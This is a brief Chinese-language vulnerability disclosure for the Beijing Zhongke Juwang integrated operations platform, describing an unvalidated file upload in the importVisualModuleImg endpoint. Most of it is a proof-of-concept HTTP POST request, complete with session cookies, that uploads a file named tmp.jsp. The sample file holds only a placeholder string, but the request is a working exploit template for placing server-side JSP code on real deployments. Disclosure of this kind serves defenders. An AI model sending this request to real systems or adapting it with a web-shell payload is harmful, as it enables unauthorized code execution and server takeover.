漏洞描述
北京中科聚网一体化运营平台存在文件上传漏洞。此漏洞是由于importVisualModuleImg接口对用户上传的文件缺乏校验导致的。
北京中科聚网一体化运营平台importVisualModuleImg接口文件上传漏洞
PoC代码
POST /manage/tplresource/importVisualModuleImg?moduleId=2 HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: keep-alive
Content-Length: 198
Content-Type: multipart/form-data; boundary=----9979a3f1-cdb1-43af-af88-a9b48b67cf71
Cookie: JSESSIONID=9438c497-92ad-4800-b821-20602adec4ac; rememberMe=dcOzuzCzFrtr02GhN9IwcsR9v759kvzO9wq/upEQ0jwsU5y/25kFW52CaKmZoRP7pwH979ifBBXB3b+li3PSXwZmxnh+bMgi6kv5vv8WNkNdy1pblj7sPxtwIm71auJPyyOl+aMKAhk/71leMQLpneRk/8f6USYL/acFuWhpjyuVU6oP6YJdIoCKGgdxAiUk;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
------9979a3f1-cdb1-43af-af88-a9b48b67cf71
Content-Disposition: form-data; name="file"; filename="tmp.jsp"
Content-Type: multipart/form-data
6666
------9979a3f1-cdb1-43af-af88-a9b48b67cf71--